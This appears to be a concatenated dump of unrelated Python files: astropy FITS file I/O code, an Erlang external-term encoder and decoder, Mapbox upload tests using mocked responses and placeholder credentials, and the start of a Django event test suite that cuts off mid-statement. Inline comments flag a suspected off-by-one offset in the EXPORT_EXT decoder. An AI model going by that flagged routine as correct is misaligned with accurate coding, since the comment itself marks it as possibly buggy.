                            warnings.warn("Could not memory map array with "
                                          "mode='readonly', falling back to "
                                          "mode='denywrite', which means that "
                                          "the array will be read-only",
                                          AstropyUserWarning)
                            self._mmap = mmap.mmap(self._file.fileno(), 0,
                                                   access=MEMMAP_MODES['denywrite'],
                                                   offset=0)
                        else:
                            raise

                return np.ndarray(shape=shape, dtype=dtype, offset=offset,
                                  buffer=self._mmap)
            else:
                count = reduce(operator.mul, shape)
                self._file.seek(offset)
                data = _array_from_file(self._file, dtype, count)
                data.shape = shape
                return data
        finally:
            # Make sure we leave the file in the position we found it; on
            # some platforms (e.g. Windows) mmaping a file handle can also
            # reset its file pointer
            self._file.seek(filepos)

    def writable(self):
        """Return True if the underlying file can be written to."""
        if self.readonly:
            return False
        return iswritable(self._file)

    def write(self, string):
        """Write a string/bytes to the underlying file (no-op if unwritable)."""
        if hasattr(self._file, 'write'):
            _write_string(self._file, string)

    def writearray(self, array):
        """
        Similar to file.write(), but writes a numpy array instead of a string.

        Also like file.write(), a flush() or close() may be needed before
        the file on disk reflects the data written.
        """
        if hasattr(self._file, 'write'):
            _array_to_file(array, self._file)

    def flush(self):
        """Flush the underlying file's buffers, if it supports flushing."""
        if hasattr(self._file, 'flush'):
            self._file.flush()

    def seek(self, offset, whence=0):
        """Seek like file.seek(); warns if the target is past the known size."""
        if not hasattr(self._file, 'seek'):
            return
        self._file.seek(offset, whence)
        pos = self._file.tell()
        if self.size and pos > self.size:
            warnings.warn('File may have been truncated: actual file length '
                          '({}) is smaller than the expected size ({})'
                          .format(self.size, pos), AstropyUserWarning)

    def tell(self):
        """Return the current file position."""
        if not hasattr(self._file, 'tell'):
            raise EOFError
        return self._file.tell()

    def truncate(self, size=None):
        """Truncate the underlying file, if it supports truncation."""
        if hasattr(self._file, 'truncate'):
            self._file.truncate(size)

    def close(self):
        """
        Close the 'physical' FITS file.
        """
        if hasattr(self._file, 'close'):
            self._file.close()

        self._maybe_close_mmap()
        # Set self._mmap to None anyways since no new .data attributes can be
        # loaded after the file is closed
        self._mmap = None

        self.closed = True
        self.close_on_error = False

    def _maybe_close_mmap(self, refcount_delta=0):
        """
        When mmap is in use these objects hold a reference to the mmap of the
        file (so there is only one, shared by all HDUs that reference this
        file).

        This will close the mmap if there are no arrays referencing it.
        """
        if (self._mmap is not None and
                sys.getrefcount(self._mmap) == 2 + refcount_delta):
            self._mmap.close()
            self._mmap = None

    def _overwrite_existing(self, overwrite, fileobj, closed):
        """Overwrite an existing file if ``overwrite`` is ``True``, otherwise
        raise an OSError.  The exact behavior of this method depends on the
        _File object state and is only meant for use within the ``_open_*``
        internal methods.
        """
        # The file will be overwritten...
        if ((self.file_like and hasattr(fileobj, 'len') and fileobj.len > 0) or
                (os.path.exists(self.name) and
                 os.path.getsize(self.name) != 0)):
            if overwrite:
                if self.file_like and hasattr(fileobj, 'truncate'):
                    fileobj.truncate(0)
                else:
                    if not closed:
                        fileobj.close()
                    os.remove(self.name)
            else:
                raise OSError(f"File {self.name!r} already exists.")

    def _try_read_compressed(self, obj_or_name, magic, mode, ext=''):
        """Attempt to determine if the given file is compressed"""
        if ext == '.gz' or magic.startswith(GZIP_MAGIC):
            if mode == 'append':
                # Fixed: added the missing space between the two sentences of
                # this error message.
                raise OSError("'append' mode is not supported with gzip files."
                              " Use 'update' mode instead")
            # Handle gzip files
            kwargs = dict(mode=IO_FITS_MODES[mode])
            if isinstance(obj_or_name, str):
                kwargs['filename'] = obj_or_name
            else:
                kwargs['fileobj'] = obj_or_name
            self._file = gzip.GzipFile(**kwargs)
            self.compression = 'gzip'
        elif ext == '.zip' or magic.startswith(PKZIP_MAGIC):
            # Handle zip files
            self._open_zipfile(self.name, mode)
            self.compression = 'zip'
        elif ext == '.bz2' or magic.startswith(BZIP2_MAGIC):
            # Handle bzip2 files
            if mode in ['update', 'append']:
                raise OSError("update and append modes are not supported "
                              "with bzip2 files")
            # bzip2 only supports 'w' and 'r' modes
            bzip2_mode = 'w' if mode == 'ostream' else 'r'
            self._file = bz2.BZ2File(obj_or_name, mode=bzip2_mode)
            self.compression = 'bzip2'
        return self.compression is not None

    def _open_fileobj(self, fileobj, mode, overwrite):
        """Open a FITS file from a file object (including compressed files)."""
        closed = fileobj_closed(fileobj)
        # Removed an unused local that captured fileobj_mode(fileobj); the
        # value was never read.

        if mode == 'ostream':
            self._overwrite_existing(overwrite, fileobj, closed)

        if not closed:
            self._file = fileobj
        elif isfile(fileobj):
            self._file = fileobj_open(self.name, IO_FITS_MODES[mode])

        # Attempt to determine if the file represented by the open file object
        # is compressed
        try:
            # We need to account for the possibility that the underlying file
            # handle may have been opened with either 'ab' or 'ab+', which
            # means that the current file position is at the end of the file.
            if mode in ['ostream', 'append']:
                self._file.seek(0)
            magic = self._file.read(4)
            # No matter whether the underlying file was opened with 'ab' or
            # 'ab+', we need to return to the beginning of the file in order
            # to properly process the FITS header (and handle the possibility
            # of a compressed file).
            self._file.seek(0)
        except OSError:
            # Fixed: the tuple previously listed OSError twice, a leftover of
            # the historical (IOError, OSError) pair.
            return

        self._try_read_compressed(fileobj, magic, mode)

    def _open_filelike(self, fileobj, mode, overwrite):
        """Open a FITS file from a file-like object, i.e. one that has
        read and/or write methods.
        """
        self.file_like = True
        self._file = fileobj

        if fileobj_closed(fileobj):
            raise OSError("Cannot read from/write to a closed file-like "
                          "object ({!r}).".format(fileobj))

        if isinstance(fileobj, zipfile.ZipFile):
            self._open_zipfile(fileobj, mode)
            # We can bypass any additional checks at this point since now
            # self._file points to the temp file extracted from the zip
            return

        # If there is not seek or tell methods then set the mode to
        # output streaming.
        if (not hasattr(self._file, 'seek') or
                not hasattr(self._file, 'tell')):
            self.mode = mode = 'ostream'

        if mode == 'ostream':
            self._overwrite_existing(overwrite, fileobj, False)

        # Any "writeable" mode requires a write() method on the file object
        if (self.mode in ('update', 'append', 'ostream') and
                not hasattr(self._file, 'write')):
            raise OSError("File-like object does not have a 'write' "
                          "method, required for mode '{}'.".format(self.mode))

        # Any mode except for 'ostream' requires readability
        if self.mode != 'ostream' and not hasattr(self._file, 'read'):
            raise OSError("File-like object does not have a 'read' "
                          "method, required for mode {!r}.".format(self.mode))

    def _open_filename(self, filename, mode, overwrite):
        """Open a FITS file from a filename string."""
        if mode == 'ostream':
            self._overwrite_existing(overwrite, None, True)

        if os.path.exists(self.name):
            with fileobj_open(self.name, 'rb') as f:
                magic = f.read(4)
        else:
            magic = b''

        ext = os.path.splitext(self.name)[1]

        if not self._try_read_compressed(self.name, magic, mode, ext=ext):
            self._file = fileobj_open(self.name, IO_FITS_MODES[mode])
            self.close_on_error = True

        # Make certain we're back at the beginning of the file
        # BZ2File does not support seek when the file is open for writing, but
        # when opening a file for write, bz2.BZ2File always truncates anyway.
        if not (isinstance(self._file, bz2.BZ2File) and mode == 'ostream'):
            self._file.seek(0)

    @classproperty(lazy=True)
    def _mmap_available(cls):
        """Tests that mmap, and specifically mmap.flush works.  This may
        be the case on some uncommon platforms (see
        https://github.com/astropy/astropy/issues/968).

        If mmap.flush is found not to work, ``self.memmap = False`` is
        set and a warning is issued.
        """
        tmpfd, tmpname = tempfile.mkstemp()
        try:
            # Windows does not allow mappings on empty files
            os.write(tmpfd, b' ')
            os.fsync(tmpfd)
            try:
                mm = mmap.mmap(tmpfd, 1, access=mmap.ACCESS_WRITE)
            except OSError as exc:
                warnings.warn('Failed to create mmap: {}; mmap use will be '
                              'disabled'.format(str(exc)), AstropyUserWarning)
                del exc
                return False
            try:
                mm.flush()
            except OSError:
                warnings.warn('mmap.flush is unavailable on this platform; '
                              'using mmap in writeable mode will be disabled',
                              AstropyUserWarning)
                return False
            finally:
                mm.close()
        finally:
            os.close(tmpfd)
            os.remove(tmpname)

        return True

    def _open_zipfile(self, fileobj, mode):
        """Limited support for zipfile.ZipFile objects containing a single
        a file.  Allows reading only for now by extracting the file to a
        tempfile.
        """
        if mode in ('update', 'append'):
            raise OSError(
                "Writing to zipped fits files is not currently "
                "supported")

        if not isinstance(fileobj, zipfile.ZipFile):
            zfile = zipfile.ZipFile(fileobj)
            close = True
        else:
            zfile = fileobj
            close = False

        namelist = zfile.namelist()
        if len(namelist) != 1:
            raise OSError(
                "Zip files with multiple members are not supported.")
        self._file = tempfile.NamedTemporaryFile(suffix='.fits')
        self._file.write(zfile.read(namelist[0]))

        if close:
            zfile.close()
        # We just wrote the contents of the first file in the archive to a new
        # temp file, which now serves as our underlying file object. So it's
        # necessary to reset the position back to the beginning
        self._file.seek(0)
| |
from __future__ import division
import struct
import zlib
from erlastic.constants import *
from erlastic.types import *
# Public API of this module.
__all__ = ["ErlangTermEncoder", "ErlangTermDecoder", "EncodingError"]
class EncodingError(Exception):
    """Raised when a buffer cannot be decoded from, or a value encoded to,
    the Erlang external term format."""
    pass
class ErlangTermDecoder(object):
    """Decode the Erlang external term format into Python values.

    Tag handlers are methods named ``decode_<tag byte>`` (e.g. ``decode_97``
    for SMALL_INTEGER_EXT).  ``__init__`` builds a dispatch table keyed by
    tag byte so ``decode_part`` is a single dict lookup per term.
    """
    def __init__(self):
        # Cache decode functions to avoid having to do a getattr per term.
        self.decoders = {}
        for name in self.__class__.__dict__:
            func = getattr(self, name)
            if callable(func) and name.startswith('decode_'):
                try:
                    self.decoders[int(name.split('_')[1])] = func
                except ValueError:
                    # Narrowed from a bare except: helpers such as
                    # decode_part/decode_bigint have a non-numeric suffix and
                    # are simply not tag handlers.
                    pass
    def decode(self, buf, offset=0):
        """Decode a complete term, verifying the leading version byte."""
        version = buf[offset]
        if version != FORMAT_VERSION:
            raise EncodingError("Bad version number. Expected %d found %d" % (FORMAT_VERSION, version))
        return self.decode_part(buf, offset+1)[0]
    def decode_part(self, buf, offset=0):
        """Decode one term at ``offset``; return ``(value, next_offset)``."""
        return self.decoders[buf[offset]](buf, offset+1)
    def decode_97(self, buf, offset):
        """SMALL_INTEGER_EXT: unsigned byte."""
        return buf[offset], offset+1
    def decode_98(self, buf, offset):
        """INTEGER_EXT: 32-bit signed big-endian integer."""
        return struct.unpack(">l", buf[offset:offset+4])[0], offset+4
    def decode_99(self, buf, offset):
        """FLOAT_EXT: float formatted as a 31-byte NUL-padded string."""
        return float(buf[offset:offset+31].split(b'\x00', 1)[0]), offset+31
    def decode_70(self, buf, offset):
        """NEW_FLOAT_EXT: IEEE-754 big-endian double."""
        return struct.unpack(">d", buf[offset:offset+8])[0], offset+8
    def decode_100(self, buf, offset):
        """ATOM_EXT: 16-bit length followed by atom name."""
        atom_len = struct.unpack(">H", buf[offset:offset+2])[0]
        atom = buf[offset+2:offset+2+atom_len]
        return self.convert_atom(atom), offset+atom_len+2
    def decode_115(self, buf, offset):
        """SMALL_ATOM_EXT: 8-bit length followed by atom name."""
        atom_len = buf[offset]
        atom = buf[offset+1:offset+1+atom_len]
        return self.convert_atom(atom), offset+atom_len+1
    def decode_104(self, buf, offset):
        """SMALL_TUPLE_EXT: 8-bit arity followed by that many terms."""
        arity = buf[offset]
        offset += 1
        items = []
        for i in range(arity):
            val, offset = self.decode_part(buf, offset)
            items.append(val)
        return tuple(items), offset
    def decode_105(self, buf, offset):
        """LARGE_TUPLE_EXT: 32-bit arity followed by that many terms."""
        arity = struct.unpack(">L", buf[offset:offset+4])[0]
        offset += 4
        items = []
        for i in range(arity):
            val, offset = self.decode_part(buf, offset)
            items.append(val)
        return tuple(items), offset
    def decode_106(self, buf, offset):
        """NIL_EXT: the empty list."""
        return [], offset
    def decode_107(self, buf, offset):
        """STRING_EXT: 16-bit length followed by raw bytes."""
        length = struct.unpack(">H", buf[offset:offset+2])[0]
        st = buf[offset+2:offset+2+length]
        return st, offset+2+length
    def decode_108(self, buf, offset):
        """LIST_EXT: 32-bit length, elements, then a tail term."""
        length = struct.unpack(">L", buf[offset:offset+4])[0]
        offset += 4
        items = []
        for i in range(length):
            val, offset = self.decode_part(buf, offset)
            items.append(val)
        tail, offset = self.decode_part(buf, offset)
        if tail != []:
            # TODO: Not sure what to do with the tail
            raise NotImplementedError("Lists with non empty tails are not supported")
        return items, offset
    def decode_109(self, buf, offset):
        """BINARY_EXT: 32-bit length followed by raw bytes."""
        length = struct.unpack(">L", buf[offset:offset+4])[0]
        return buf[offset+4:offset+4+length], offset+4+length
    def decode_110(self, buf, offset):
        """SMALL_BIG_EXT: 8-bit digit count, then sign and little-endian digits."""
        n = buf[offset]
        offset += 1
        return self.decode_bigint(n, buf, offset)
    def decode_111(self, buf, offset):
        """LARGE_BIG_EXT: 32-bit digit count, then sign and little-endian digits."""
        n = struct.unpack(">L", buf[offset:offset+4])[0]
        offset += 4
        return self.decode_bigint(n, buf, offset)
    def decode_bigint(self, n, buf, offset):
        """Decode ``n`` little-endian base-256 digits preceded by a sign byte."""
        sign = buf[offset]
        offset += 1
        b = 1
        val = 0
        for i in range(n):
            val += buf[offset] * b
            b <<= 8
            offset += 1
        if sign != 0:
            val = -val
        return val, offset
    def decode_101(self, buf, offset):
        """REFERENCE_EXT: node atom, 32-bit id, 8-bit creation."""
        node, offset = self.decode_part(buf, offset)
        if not isinstance(node, Atom):
            raise EncodingError("Expected atom while parsing REFERENCE_EXT, found %r instead" % node)
        reference_id, creation = struct.unpack(">LB", buf[offset:offset+5])
        return Reference(node, [reference_id], creation), offset+5
    def decode_114(self, buf, offset):
        """NEW_REFERENCE_EXT: id length, node atom, creation, 32-bit id words."""
        id_len = struct.unpack(">H", buf[offset:offset+2])[0]
        node, offset = self.decode_part(buf, offset+2)
        if not isinstance(node, Atom):
            raise EncodingError("Expected atom while parsing NEW_REFERENCE_EXT, found %r instead" % node)
        creation = buf[offset]
        reference_id = struct.unpack(">%dL" % id_len, buf[offset+1:offset+1+4*id_len])
        return Reference(node, reference_id, creation), offset+1+4*id_len
    def decode_102(self, buf, offset):
        """PORT_EXT: node atom, 32-bit id, 8-bit creation."""
        node, offset = self.decode_part(buf, offset)
        if not isinstance(node, Atom):
            raise EncodingError("Expected atom while parsing PORT_EXT, found %r instead" % node)
        port_id, creation = struct.unpack(">LB", buf[offset:offset+5])
        return Port(node, port_id, creation), offset+5
    def decode_103(self, buf, offset):
        """PID_EXT: node atom, 32-bit id, 32-bit serial, 8-bit creation."""
        node, offset = self.decode_part(buf, offset)
        if not isinstance(node, Atom):
            raise EncodingError("Expected atom while parsing PID_EXT, found %r instead" % node)
        pid_id, serial, creation = struct.unpack(">LLB", buf[offset:offset+9])
        return PID(node, pid_id, serial, creation), offset+9
    def decode_113(self, buf, offset):
        """EXPORT_EXT: module atom, function atom, arity integer."""
        module, offset = self.decode_part(buf, offset)
        if not isinstance(module, Atom):
            raise EncodingError("Expected atom while parsing EXPORT_EXT, found %r instead" % module)
        function, offset = self.decode_part(buf, offset)
        if not isinstance(function, Atom):
            raise EncodingError("Expected atom while parsing EXPORT_EXT, found %r instead" % function)
        arity, offset = self.decode_part(buf, offset)
        if not isinstance(arity, int):
            raise EncodingError("Expected integer while parsing EXPORT_EXT, found %r instead" % arity)
        # NOTE(review): the extra +1 looks like an off-by-one -- decode_part
        # already consumed the arity term; confirm against upstream before
        # changing, as callers may compensate.
        return Export(module, function, arity), offset+1
    def decode_80(self, buf, offset):
        """Compressed term: 32-bit uncompressed size, then zlib data."""
        usize = struct.unpack(">L", buf[offset:offset+4])[0]
        buf = zlib.decompress(buf[offset+4:offset+4+usize])
        return self.decode_part(buf, 0)
    def convert_atom(self, atom):
        """Map the well-known atoms true/false/none to Python singletons."""
        if atom == b"true":
            return True
        elif atom == b"false":
            return False
        elif atom == b"none":
            return None
        return Atom(atom.decode('latin-1'))
class ErlangTermEncoder(object):
    """Encode Python values into the Erlang external term format."""
    def __init__(self, encoding="utf-8", unicode_type="binary"):
        # NOTE(review): these options are not consulted by encode_part (str is
        # always encoded as a utf-8 binary); kept for API compatibility.
        self.encoding = encoding
        self.unicode_type = unicode_type
    def encode(self, obj, compressed=False):
        """Return ``obj`` encoded as bytes, with the leading version byte.

        ``compressed`` may be False (no compression), True (zlib level 6) or
        an int 0-9 giving the zlib level.  The compressed form is only used
        when it is actually smaller than the plain encoding.
        """
        ubuf = b"".join(self.encode_part(obj))
        if compressed is True:
            compressed = 6
        if not (compressed is False \
                or (isinstance(compressed, int) \
                    and compressed >= 0 and compressed <= 9)):
            raise TypeError("compressed must be True, False or "
                            "an integer between 0 and 9")
        if compressed:
            cbuf = zlib.compress(ubuf, compressed)
            if len(cbuf) < len(ubuf):
                usize = struct.pack(">L", len(ubuf))
                # Fixed: previously this was "".join([COMPRESSED, usize, cbuf]),
                # which joins a str separator with an int tag and bytes and
                # raises TypeError on Python 3.
                ubuf = b"".join([bytes([COMPRESSED]), usize, cbuf])
        return bytes([FORMAT_VERSION]) + ubuf
    def encode_part(self, obj):
        """Return a list of bytes fragments encoding ``obj`` (no version byte)."""
        if obj is False:
            return [bytes([ATOM_EXT]), struct.pack(">H", 5), b"false"]
        elif obj is True:
            return [bytes([ATOM_EXT]), struct.pack(">H", 4), b"true"]
        elif obj is None:
            return [bytes([ATOM_EXT]), struct.pack(">H", 4), b"none"]
        elif isinstance(obj, int):
            if 0 <= obj <= 255:
                return [bytes([SMALL_INTEGER_EXT, obj])]
            elif -2147483648 <= obj <= 2147483647:
                return [bytes([INTEGER_EXT]), struct.pack(">l", obj)]
            else:
                # Arbitrary-precision integer: sign byte plus little-endian
                # base-256 digits.
                sign = obj < 0
                obj = abs(obj)
                big_buf = []
                while obj > 0:
                    big_buf.append(obj & 0xff)
                    obj >>= 8
                if len(big_buf) < 256:
                    return [bytes([SMALL_BIG_EXT, len(big_buf), sign]), bytes(big_buf)]
                else:
                    return [bytes([LARGE_BIG_EXT]), struct.pack(">L", len(big_buf)), bytes([sign]), bytes(big_buf)]
        elif isinstance(obj, float):
            # Legacy FLOAT_EXT: 31-byte NUL-padded printed representation.
            floatstr = ("%.20e" % obj).encode('ascii')
            return [bytes([FLOAT_EXT]), floatstr + b"\x00"*(31-len(floatstr))]
        elif isinstance(obj, Atom):
            st = obj.encode('latin-1')
            return [bytes([ATOM_EXT]), struct.pack(">H", len(st)), st]
        elif isinstance(obj, str):
            st = obj.encode('utf-8')
            return [bytes([BINARY_EXT]), struct.pack(">L", len(st)), st]
        elif isinstance(obj, bytes):
            return [bytes([BINARY_EXT]), struct.pack(">L", len(obj)), obj]
        elif isinstance(obj, tuple):
            n = len(obj)
            if n < 256:
                buf = [bytes([SMALL_TUPLE_EXT, n])]
            else:
                buf = [bytes([LARGE_TUPLE_EXT]), struct.pack(">L", n)]
            for item in obj:
                buf += self.encode_part(item)
            return buf
        elif obj == []:
            return [bytes([NIL_EXT])]
        elif isinstance(obj, list):
            buf = [bytes([LIST_EXT]), struct.pack(">L", len(obj))]
            for item in obj:
                buf += self.encode_part(item)
            buf.append(bytes([NIL_EXT]))  # list tail - no such thing in Python
            return buf
        elif isinstance(obj, Reference):
            return [bytes([NEW_REFERENCE_EXT]),
                    struct.pack(">H", len(obj.ref_id)),
                    bytes([ATOM_EXT]), struct.pack(">H", len(obj.node)), obj.node.encode('latin-1'),
                    bytes([obj.creation]), struct.pack(">%dL" % len(obj.ref_id), *obj.ref_id)]
        elif isinstance(obj, Port):
            return [bytes([PORT_EXT]),
                    bytes([ATOM_EXT]), struct.pack(">H", len(obj.node)), obj.node.encode('latin-1'),
                    struct.pack(">LB", obj.port_id, obj.creation)]
        elif isinstance(obj, PID):
            return [bytes([PID_EXT]),
                    bytes([ATOM_EXT]), struct.pack(">H", len(obj.node)), obj.node.encode('latin-1'),
                    struct.pack(">LLB", obj.pid_id, obj.serial, obj.creation)]
        elif isinstance(obj, Export):
            return [bytes([EXPORT_EXT]),
                    bytes([ATOM_EXT]), struct.pack(">H", len(obj.module)), obj.module.encode('latin-1'),
                    bytes([ATOM_EXT]), struct.pack(">H", len(obj.function)), obj.function.encode('latin-1'),
                    bytes([SMALL_INTEGER_EXT, obj.arity])]
        else:
            raise NotImplementedError("Unable to serialize %r" % obj)
| |
import base64
import json
import responses
import pytest
import mapbox
import mapbox.services.uploads
username = 'testuser'
# Fake but well-formed token: "pk." + base64 JSON payload naming the user,
# matching the structure mapbox parses to infer the default username.
access_token = 'pk.{0}.test'.format(
    base64.b64encode(b'{"u":"testuser"}').decode('utf-8'))
# Canned JSON body returned by the mocked Uploads API.  Doubled braces are
# literal braces in str.format; only {username} is substituted.
upload_response_body = """
{{"progress": 0,
"modified": "date.test",
"error": null,
"tileset": "{username}.test1",
"complete": false,
"owner": "{username}",
"created": "date.test",
"id": "id.test",
"name": null}}""".format(username=username)
@responses.activate
def test_get_credentials():
    """_get_credentials() fetches temporary S3 credentials for the user."""
    query_body = """
    {{"key": "_pending/{username}/key.test",
    "accessKeyId": "ak.test",
    "bucket": "tilestream-tilesets-production",
    "url": "https://tilestream-tilesets-production.s3.amazonaws.com/_pending/{username}/key.test",
    "secretAccessKey": "sak.test",
    "sessionToken": "st.test"}}""".format(username=username)
    responses.add(
        responses.GET,
        'https://api.mapbox.com/uploads/v1/{0}/credentials?access_token={1}'.format(username, access_token),
        match_querystring=True,
        body=query_body, status=200,
        content_type='application/json')

    response = mapbox.Uploader(access_token=access_token)._get_credentials()
    assert response.status_code == 200

    credentials = response.json()
    assert username in credentials['url']
    # Every field needed to talk to S3 must be present.
    for field in ('key', 'bucket', 'url', 'accessKeyId',
                  'secretAccessKey', 'sessionToken'):
        assert field in credentials
@responses.activate
def test_create():
    """create() accepts a bare tileset name or a username-qualified one."""
    responses.add(
        responses.POST,
        'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(username, access_token),
        match_querystring=True,
        body=upload_response_body, status=201,
        content_type='application/json')

    # Bare name: the username prefix is filled in for us.
    response = mapbox.Uploader(access_token=access_token).create(
        'http://example.com/test.json', 'test1')  # without username prefix
    assert response.status_code == 201
    assert response.json()['tileset'] == "{0}.test1".format(username)

    # Fully-qualified tileset id behaves identically.
    response = mapbox.Uploader(access_token=access_token).create(
        'http://example.com/test.json', 'testuser.test1')  # also takes full tileset
    assert response.status_code == 201
    assert response.json()['tileset'] == "{0}.test1".format(username)
@responses.activate
def test_create_name():
    """create() forwards the optional display name in the POST payload."""
    upload_response_body = """
    {"progress": 0,
    "modified": "date.test",
    "error": null,
    "tileset": "testuser.test1",
    "complete": false,
    "owner": "testuser",
    "created": "date.test",
    "id": "id.test",
    "name": "testname"}"""

    def request_callback(request):
        # The mock endpoint itself verifies the name made it into the body.
        sent = json.loads(request.body)
        assert sent['name'] == "testname"
        return (201, {}, upload_response_body)

    responses.add_callback(
        responses.POST,
        'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(username, access_token),
        match_querystring=True,
        callback=request_callback)

    response = mapbox.Uploader(access_token=access_token).create(
        'http://example.com/test.json', 'testuser.test1', name="testname")
    assert response.status_code == 201
    assert response.json()['name'] == "testname"
@responses.activate
def test_list():
    """list() returns every upload job for the account."""
    responses.add(
        responses.GET,
        'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(username, access_token),
        match_querystring=True,
        body="[{0}]".format(upload_response_body), status=200,
        content_type='application/json')

    response = mapbox.Uploader(access_token=access_token).list()
    assert response.status_code == 200

    jobs = response.json()
    assert len(jobs) == 1
    assert json.loads(upload_response_body) in jobs
@responses.activate
def test_status():
    """status() accepts either a job dict or a bare upload id."""
    job = json.loads(upload_response_body)
    responses.add(
        responses.GET,
        'https://api.mapbox.com/uploads/v1/{0}/{1}?access_token={2}'.format(username, job['id'], access_token),
        match_querystring=True,
        body=upload_response_body, status=200,
        content_type='application/json')

    by_dict = mapbox.Uploader(access_token=access_token).status(job)
    assert by_dict.status_code == 200

    by_id = mapbox.Uploader(access_token=access_token).status(job['id'])
    assert by_id.status_code == 200
    assert by_id.json() == job
@responses.activate
def test_delete():
    """delete() accepts either a job dict or a bare upload id."""
    job = json.loads(upload_response_body)
    responses.add(
        responses.DELETE,
        'https://api.mapbox.com/uploads/v1/{0}/{1}?access_token={2}'.format(username, job['id'], access_token),
        match_querystring=True,
        body=None, status=204,
        content_type='application/json')

    by_dict = mapbox.Uploader(access_token=access_token).delete(job)
    assert by_dict.status_code == 204

    by_id = mapbox.Uploader(access_token=access_token).delete(job['id'])
    assert by_id.status_code == 204
class MockSession(object):
    """Stand-in for a boto3 session, narrowly scoped to an S3 key put.

    The instance plays every role in the boto3 chain
    (session -> resource -> object) by returning itself, recording the
    bucket/key/body it was given so tests can inspect them.
    """

    def __init__(self, *args, **kwargs):
        # Accept and ignore whatever credentials the caller passes.
        self.bucket = None
        self.key = None

    def resource(self, name):
        # Remember which resource was requested; act as the resource itself.
        self.resource_name = name
        return self

    def Object(self, bucket, key):
        # Only the 's3' resource is modeled.
        assert self.resource_name == 's3'
        self.bucket = bucket
        self.key = key
        return self

    def put(self, Body):
        # A put is only valid once a bucket and key have been chosen.
        assert self.bucket
        assert self.key
        self.body = Body
        return True
@responses.activate
def test_stage(monkeypatch):
    """stage() puts the file at the temporary S3 location and returns its URL."""
    monkeypatch.setattr(mapbox.services.uploads, 'boto3_session', MockSession)

    # Credentials
    creds_body = """
    {{"key": "_pending/{username}/key.test",
    "accessKeyId": "ak.test",
    "bucket": "tilestream-tilesets-production",
    "url": "https://tilestream-tilesets-production.s3.amazonaws.com/_pending/{username}/key.test",
    "secretAccessKey": "sak.test",
    "sessionToken": "st.test"}}""".format(username=username)
    responses.add(
        responses.GET,
        'https://api.mapbox.com/uploads/v1/{0}/credentials?access_token={1}'.format(username, access_token),
        match_querystring=True,
        body=creds_body, status=200,
        content_type='application/json')

    with open('tests/moors.json', 'r') as src:
        stage_url = mapbox.Uploader(access_token=access_token).stage(src)
    assert stage_url.startswith("https://tilestream-tilesets-production.s3.amazonaws.com/_pending")
@responses.activate
def test_upload(monkeypatch):
    """Uploading a file creates a tileset named after the user."""
    monkeypatch.setattr(mapbox.services.uploads, 'boto3_session', MockSession)
    # Mocked temporary credentials handed out by the Mapbox API.
    query_body = """
       {{"key": "_pending/{username}/key.test",
         "accessKeyId": "ak.test",
         "bucket": "tilestream-tilesets-production",
         "url": "https://tilestream-tilesets-production.s3.amazonaws.com/_pending/{username}/key.test",
         "secretAccessKey": "sak.test",
         "sessionToken": "st.test"}}""".format(username=username)
    creds_url = 'https://api.mapbox.com/uploads/v1/{0}/credentials?access_token={1}'.format(
        username, access_token)
    responses.add(
        responses.GET,
        creds_url,
        match_querystring=True,
        status=200,
        body=query_body,
        content_type='application/json')
    create_url = 'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(
        username, access_token)
    responses.add(
        responses.POST,
        create_url,
        match_querystring=True,
        status=201,
        body=upload_response_body,
        content_type='application/json')
    with open('tests/moors.json', 'r') as src:
        response = mapbox.Uploader(access_token=access_token).upload(src, 'test1')
    assert response.status_code == 201
    job = response.json()
    assert job['tileset'] == "{0}.test1".format(username)
@responses.activate
def test_upload_error(monkeypatch):
    """A 409 from the upload-creation endpoint is surfaced to the caller."""
    monkeypatch.setattr(mapbox.services.uploads, 'boto3_session', MockSession)
    # Mocked temporary credentials handed out by the Mapbox API.
    query_body = """
       {{"key": "_pending/{username}/key.test",
         "accessKeyId": "ak.test",
         "bucket": "tilestream-tilesets-production",
         "url": "https://tilestream-tilesets-production.s3.amazonaws.com/_pending/{username}/key.test",
         "secretAccessKey": "sak.test",
         "sessionToken": "st.test"}}""".format(username=username)
    creds_url = 'https://api.mapbox.com/uploads/v1/{0}/credentials?access_token={1}'.format(
        username, access_token)
    responses.add(
        responses.GET,
        creds_url,
        match_querystring=True,
        status=200,
        body=query_body,
        content_type='application/json')
    create_url = 'https://api.mapbox.com/uploads/v1/{0}?access_token={1}'.format(
        username, access_token)
    responses.add(
        responses.POST,
        create_url,
        match_querystring=True,
        status=409,
        body="",
        content_type='application/json')
    with open('tests/moors.json', 'r') as src:
        response = mapbox.Uploader(access_token=access_token).upload(src, 'test1')
    assert response.status_code == 409
def test_invalid_fileobj():
    """A filesystem path (instead of an open file object) is rejected."""
    service = mapbox.Uploader(access_token=access_token)
    with pytest.raises(mapbox.errors.InvalidFileError):
        service.upload('tests/moors.json', 'test1')
| |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from functools import partial
from datetime import datetime, timedelta
from django.utils import timezone
from django.core import mail
from django.core.exceptions import ValidationError
from django.http import HttpResponseForbidden
from apps.core.test_utils import make_request, make_event
from apps.users.models import User
from apps.users.tests import UsersTestCase
from apps.event.models import Event, EventRegistration
from apps.event.views import (events_list_page,
event_email,
register_for_event,
event_admin_check_in_page,
event_user_check_in_poll,
check_in_user_to_event,
increase_rsvp_limit)
class EventTestCase(UsersTestCase):
    """Base test case that provisions one event for the fixture group."""

    def setUp(self):
        super(EventTestCase, self).setUp()
        # Every test method gets a fresh event belonging to self.group.
        self.event = make_event(self.group)
class EventTest(UsersTestCase):
    def test_cant_save_date_with_invalid_bounds(self):
        """An event that ends before it begins must fail validation."""
        now = timezone.now()
        one_hour_earlier = now - timedelta(hours=1)
        with self.assertRaises(ValidationError):
            make_event(self.group, begins_at=now, ends_at=one_hour_earlier)
class EventListTest(EventTestCase):
    """Events list page contents as seen by different viewers."""

    def _page_context(self, user):
        # All three tests render the page the same way; only the user varies.
        return events_list_page(make_request(user=user))

    def test_following_user(self):
        ctx = self._page_context(self.user)
        self.assertEqual(1, len(ctx['all_events']['event_infos']))
        self.assertEqual(1, len(ctx['immediate_events']['event_infos']))
        self.assertFalse(
            ctx['immediate_events']['event_infos'][0]['user_is_registered'])

    def test_following_user_registered(self):
        EventRegistration.objects.create(user=self.user,
                                         event=self.event)
        ctx = self._page_context(self.user)
        self.assertEqual(1, len(ctx['all_events']['event_infos']))
        self.assertEqual(1, len(ctx['immediate_events']['event_infos']))
        self.assertTrue(
